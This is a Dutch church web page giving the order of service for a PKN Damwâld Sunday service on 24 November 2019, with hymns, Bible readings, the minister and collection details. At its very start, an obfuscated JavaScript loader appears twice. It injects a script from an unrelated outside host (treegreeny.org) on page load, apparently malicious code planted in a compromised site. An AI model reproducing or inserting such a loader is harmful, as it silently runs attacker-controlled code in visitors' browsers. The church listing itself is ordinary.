;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 24 november 2019 9:30 uur - PKN Damwâld
zondag 24 november 2019
09:30 uur

Kerkdienst zondag 24 november 2019 9:30 uur

Thema: Eeuwigheidszondag

Informatie

Voorganger:Ds. G.J. Otter
Organist:Ivo van Hijum
Thema:Eeuwigheidszondag
Liturgie
Lied voor de dienst Elb 170 : 1 en 2
Welkom
We zingen: Elb 203 : 1, 2 en 3
Stil Gebed, Votum en Groet
We zingen: Elb 189a : 1 en 4
Geloofsbelijdenis
We zingen: Elb 299 : 1 en 3
Gebed
We lezen: Gen. 28 : 1-5
We zingen: Johannes de heer 232: 1 en 2
We lezen: Gen. 28 : 10 - 22
We zingen: Elb 409 : 1 en 2
Preek .
We zingen: Gezang 392 : 1, 3 en 5
Namen van overledenen noemen
2 minuten Stilte
We zingen: You raise me up
Dankzegging en voorbede
Collecte
We zingen: Elb 413 : 1, 2 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Diaconie
Tweede collecte: Kerk
Uitganscollecte: Kerk